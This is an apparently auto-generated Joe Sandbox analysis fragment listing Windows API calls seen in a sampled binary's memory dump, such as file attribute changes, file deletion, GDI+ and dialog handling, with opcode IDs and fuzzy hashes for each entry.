                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Process$AffinityCurrentMask
                    • String ID:
                    • API String ID: 1231390398-0
                    • Opcode ID: a97d6661746644a311074d673e424d131d407ea796ee328e5e1dc524cd02c018
                    • Instruction ID: ccd288bd118ffdfb0042557c17dd7f37436dabfeb320b60009af3dbc746ee552
                    • Opcode Fuzzy Hash: a97d6661746644a311074d673e424d131d407ea796ee328e5e1dc524cd02c018
                    • Instruction Fuzzy Hash: 33E0D832F10105AF8F0987F4AC158EF73DCDA4420531181B6A527E3100FA78DE0547A4
                    APIs
                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B6B5B5,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B8FA
                      • Part of subcall function 00B6CF32: _wcslen.LIBCMT ref: 00B6CF56
                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B6B5B5,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B92B
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AttributesFile$_wcslen
                    • String ID:
                    • API String ID: 2673547680-0
                    • Opcode ID: b2089d8a0b3ac56d6d2a5a7300c1619457936848c22fdfe7206178bedd4af7d2
                    • Instruction ID: f74870c74e91736db6e3e1f28ef03d983862217b13230f916dbf5a2ae5318ed8
                    • Opcode Fuzzy Hash: b2089d8a0b3ac56d6d2a5a7300c1619457936848c22fdfe7206178bedd4af7d2
                    • Instruction Fuzzy Hash: F3F0A93210420ABBDF115FA1CC10FEA3BACFB043C5F0080A1BA48D61A4DB31DD95EA60
                    APIs
                    • DeleteFileW.KERNELBASE(?,00000000,?,00B6A438,?,?,?,?,00B6892B,?,?,?,00B9380F,000000FF), ref: 00B6B481
                      • Part of subcall function 00B6CF32: _wcslen.LIBCMT ref: 00B6CF56
                    • DeleteFileW.KERNEL32(?,?,?,00000800,?,00B6A438,?,?,?,?,00B6892B,?,?,?,00B9380F,000000FF), ref: 00B6B4AF
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: DeleteFile$_wcslen
                    • String ID:
                    • API String ID: 2643169976-0
                    • Opcode ID: a913aba488f58b869033a6a00bcf673a4cefc7e43306b7d5126c5f804c1472f6
                    • Instruction ID: a583897aeab7ad4ef94f71a0906088456bd7b91116e3c87d0b8173d244bab9fb
                    • Opcode Fuzzy Hash: a913aba488f58b869033a6a00bcf673a4cefc7e43306b7d5126c5f804c1472f6
                    • Instruction Fuzzy Hash: E1E0D8321402096BEB015F60CC45FEA37EDEF043C2F4440A1BA49D6191DF79DDC5AE50
                    APIs
                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00B9380F,000000FF), ref: 00B7BDB5
                    • OleUninitialize.OLE32(?,?,?,?,00B9380F,000000FF), ref: 00B7BDBA
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: GdiplusShutdownUninitialize
                    • String ID:
                    • API String ID: 3856339756-0
                    • Opcode ID: 0319edd091284993fcc71eeb2914990f4d58f34c39b50f3015fca7adf3ac8d80
                    • Instruction ID: 098cd66c12b494c1d0f01ff5f83319a663d1aed1e6f62d025409eed447e7920a
                    • Opcode Fuzzy Hash: 0319edd091284993fcc71eeb2914990f4d58f34c39b50f3015fca7adf3ac8d80
                    • Instruction Fuzzy Hash: FDE03972604A50AFCB109B48DC05B59FBE9FB89A20F14826AB416937A0CF74A801CA94
                    APIs
                    • _swprintf.LIBCMT ref: 00B7F02C
                      • Part of subcall function 00B64A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B64A33
                    • SetDlgItemTextW.USER32(00000065,?), ref: 00B7F043
                      • Part of subcall function 00B7C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B7C769
                      • Part of subcall function 00B7C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B7C77A
                      • Part of subcall function 00B7C758: IsDialogMessageW.USER32(000104C2,?), ref: 00B7C78E
                      • Part of subcall function 00B7C758: TranslateMessage.USER32(?), ref: 00B7C79C
                      • Part of subcall function 00B7C758: DispatchMessageW.USER32(?), ref: 00B7C7A6
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                    • String ID:
                    • API String ID: 2718869927-0
                    • Opcode ID: a5c47843a369b5becf368c2a6bd99ca4336c240d78e2ebef2b58b8e0a846dfc6
                    • Instruction ID: 942370136fcbe2c1fffbed279b501ca4c67af5b7dd8e671253065098fdb17e96
                    • Opcode Fuzzy Hash: a5c47843a369b5becf368c2a6bd99ca4336c240d78e2ebef2b58b8e0a846dfc6
                    • Instruction Fuzzy Hash: D2E0D17641424C76DF016761DC0BFEB3ADCAB097C9F0804A1B245971A2DF74D910DB72
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,?,?,00B6B4CA,?,00B68042,?), ref: 00B6B4E4
                      • Part of subcall function 00B6CF32: _wcslen.LIBCMT ref: 00B6CF56
                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,00B6B4CA,?,00B68042,?), ref: 00B6B510
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AttributesFile$_wcslen
                    • String ID:
                    • API String ID: 2673547680-0
                    • Opcode ID: e21fdbe1e33c118c53648b9acc6ebed7117d081f2adce00366ed847ec83a8ccb
                    • Instruction ID: 777063eee57a4752b3ba5af18d02f54d8b770b27c757f3250e9b13b37362d364
                    • Opcode Fuzzy Hash: e21fdbe1e33c118c53648b9acc6ebed7117d081f2adce00366ed847ec83a8ccb
                    • Instruction Fuzzy Hash: A6E0D8315002286BCB20AB64DC14FD97BECEB193E5F0002B1FE5AE3195DB749D818AD0
                    APIs
                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B71B56
                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B7063A,Crypt32.dll,00000000,00B706B4,00000200,?,00B70697,00000000,00000000,?), ref: 00B71B78
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: DirectoryLibraryLoadSystem
                    • String ID:
                    • API String ID: 1175261203-0
                    • Opcode ID: caf895a2385300c585c879ff28ac12f67452d7854d39b22c48a3ac856819d360
                    • Instruction ID: a3ea370c6ef1f4cc8075ca96c12f64c92cddfb84753a5d73808e813c7238c603
                    • Opcode Fuzzy Hash: caf895a2385300c585c879ff28ac12f67452d7854d39b22c48a3ac856819d360
                    • Instruction Fuzzy Hash: C0E04F769001686ADB11ABA4DD09FDA77ACEF093C1F0444A6B649E3008DF74DA84CBB0
                    APIs
                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B7B3E9
                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00B7B3F0
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: BitmapCreateFromGdipStream
                    • String ID:
                    • API String ID: 1918208029-0
                    • Opcode ID: 21e5972d38c3896a3e6a654e2f4a493fabefa0d836749d6254edebad4330eb6d
                    • Instruction ID: 013600d0801151b102b1d1fef65f95a0053f1647f472c5d93712f6bbd672b080
                    • Opcode Fuzzy Hash: 21e5972d38c3896a3e6a654e2f4a493fabefa0d836749d6254edebad4330eb6d
                    • Instruction Fuzzy Hash: 83E0ED71501218EFCB20DF99C541BA9B7E8EB04350F20C0AAE8A993600D374AF449B95
                    APIs
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B83D3A
                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00B83D45
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                    • String ID:
                    • API String ID: 1660781231-0
                    • Opcode ID: 3a6d279fe63bb1d32d4f129bdf2e6e09c44310e543310ff45d2efe89a498b367
                    • Instruction ID: 41cfa580cf91d48278c77bca1872f32f7e7c964b4c224601d0d34b6435dacd9b
                    • Opcode Fuzzy Hash: 3a6d279fe63bb1d32d4f129bdf2e6e09c44310e543310ff45d2efe89a498b367
                    • Instruction Fuzzy Hash: EFD0223544870314CC0832786C0385923C4E822F71BA02AFAE0309B0F2FF248B01EB21
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ItemShowWindow
                    • String ID:
                    • API String ID: 3351165006-0
                    • Opcode ID: e1e4c3ed217f3866606bab9cf76c2431aadea3f57ac73adffdc4791799c74449
                    • Instruction ID: 93faf3e392bc21a941674485630bb438ed521cb3b91574134274d7032a1198c1
                    • Opcode Fuzzy Hash: e1e4c3ed217f3866606bab9cf76c2431aadea3f57ac73adffdc4791799c74449
                    • Instruction Fuzzy Hash: 91C01232058900BECB110B70DC0DD2A7BA8AB98211F15C904F1A5D2060C639C050DB11
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: 4bb526efebbf0051e755a05e7243bb322a1f39097c4f7eec7c7a120625c7e5f8
                    • Instruction ID: eb48fef6ef205a5532b941b93832156429bb29b2f83458c472263586dddf6089
                    • Opcode Fuzzy Hash: 4bb526efebbf0051e755a05e7243bb322a1f39097c4f7eec7c7a120625c7e5f8
                    • Instruction Fuzzy Hash: E1C16231A002549BDF15CF2C8994BAD7BE5EF46310F1C09FAEC059F296CB399A44CBA1
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: 0c67a175041fc2054e5a2adee3f01d1bc857614d2d1eabf072526a341659a2ab
                    • Instruction ID: 16f142c1ce5a8c72e70d49e08d3120ad724589b419f95d4143e8d3006e147b0d
                    • Opcode Fuzzy Hash: 0c67a175041fc2054e5a2adee3f01d1bc857614d2d1eabf072526a341659a2ab
                    • Instruction Fuzzy Hash: 7471C2B1504B859FCB21EB74C851AE7B7E8FF15300F0409AEE2AB43281DB79B644CB15
                    APIs
                    • __EH_prolog.LIBCMT ref: 00B690A7
                      • Part of subcall function 00B613F8: __EH_prolog.LIBCMT ref: 00B613FD
                      • Part of subcall function 00B62032: __EH_prolog.LIBCMT ref: 00B62037
                      • Part of subcall function 00B6B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B6B991
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: H_prolog$CloseFind
                    • String ID:
                    • API String ID: 2506663941-0
                    • Opcode ID: eb8293afac50fea1eee701d32e0337c15e0b57a6713e0e9e0616888b0d9c8192
                    • Instruction ID: 822221e413b6183c9dc06e955a178225c78438cc68a6ef1e953e2802d98e0226
                    • Opcode Fuzzy Hash: eb8293afac50fea1eee701d32e0337c15e0b57a6713e0e9e0616888b0d9c8192
                    • Instruction Fuzzy Hash: 05417271904254AADB24DB64C8A5AEAB3FDFF11344F4404EAF58AA70C2DB795F89CF10
                    APIs
                    • __EH_prolog.LIBCMT ref: 00B613FD
                      • Part of subcall function 00B66891: __EH_prolog.LIBCMT ref: 00B66896
                      • Part of subcall function 00B6E298: __EH_prolog.LIBCMT ref: 00B6E29D
                      • Part of subcall function 00B6644D: __EH_prolog.LIBCMT ref: 00B66452
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: 6314b6b6efcfe2068890e8dfb1272683f391ebccb1a89be81dc385a6e9bc5f0b
                    • Instruction ID: edab172f1ff7d098aa4d82bbd332b8236cb89ae6d353495149a1e07e5b665649
                    • Opcode Fuzzy Hash: 6314b6b6efcfe2068890e8dfb1272683f391ebccb1a89be81dc385a6e9bc5f0b
                    • Instruction Fuzzy Hash: 145133B1A063808ECB14DF2994802D9BBE5AF59300F0846BEEC5DDF79BDB754214CB62
                    APIs
                    • __EH_prolog.LIBCMT ref: 00B613FD
                      • Part of subcall function 00B66891: __EH_prolog.LIBCMT ref: 00B66896
                      • Part of subcall function 00B6E298: __EH_prolog.LIBCMT ref: 00B6E29D
                      • Part of subcall function 00B6644D: __EH_prolog.LIBCMT ref: 00B66452
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: fc4f03bec8ea6eef25453ddd35fd5ac58abf41891516094e86b47477847d699b
                    • Instruction ID: 73986ab84cd0c37ec9b0914d5487a1e64eba39ff859d7674042c9b044f20ecf7
                    • Opcode Fuzzy Hash: fc4f03bec8ea6eef25453ddd35fd5ac58abf41891516094e86b47477847d699b
                    • Instruction Fuzzy Hash: CE5132B19063808ECB14DF6994802D9BBE5AF29300F0846BEEC5DDF78BDB750214CB62
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: 0e05cfee97c79e2f0fce6ecd6b4449434f2ad34787a7c5f11a31150bf6b83528
                    • Instruction ID: 79a2ef62d0b025fc775b7dbda231500cc45acab84cc59362bbaa8875e7a0e2d6
                    • Opcode Fuzzy Hash: 0e05cfee97c79e2f0fce6ecd6b4449434f2ad34787a7c5f11a31150bf6b83528
                    • Instruction Fuzzy Hash: B92126B2E40216AFDB14EF74CC4566BB6E8FF04714F0046BAE529EB681E7709D00C7A9
                    APIs
                    • __EH_prolog.LIBCMT ref: 00B7C21C
                      • Part of subcall function 00B613F8: __EH_prolog.LIBCMT ref: 00B613FD
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: 22a5e8678653720349b0b48bded95d27f519eaa657b411a6db4f8f0828497a98
                    • Instruction ID: d001c31af567d14f47128cda91a396cd5112579fb153bf8851454cc8f7260bb9
                    • Opcode Fuzzy Hash: 22a5e8678653720349b0b48bded95d27f519eaa657b411a6db4f8f0828497a98
                    • Instruction Fuzzy Hash: B1216D75804219AECF25EF98C8419EEBBF4FF05304F0044EDE81AB3252D7796A45EB60
                    APIs
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00B8BEB8
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AddressProc
                    • String ID:
                    • API String ID: 190572456-0
                    • Opcode ID: 477c4c6ade9ad9b32931b806e32f2b2851ef967b1e8ad70b61c2f0775aa3b4fa
                    • Instruction ID: 3b24a6845d34c0dc3802cb0471b57eadbd8e10a1eee815fc087c6a8a42f97ca4
                    • Opcode Fuzzy Hash: 477c4c6ade9ad9b32931b806e32f2b2851ef967b1e8ad70b61c2f0775aa3b4fa
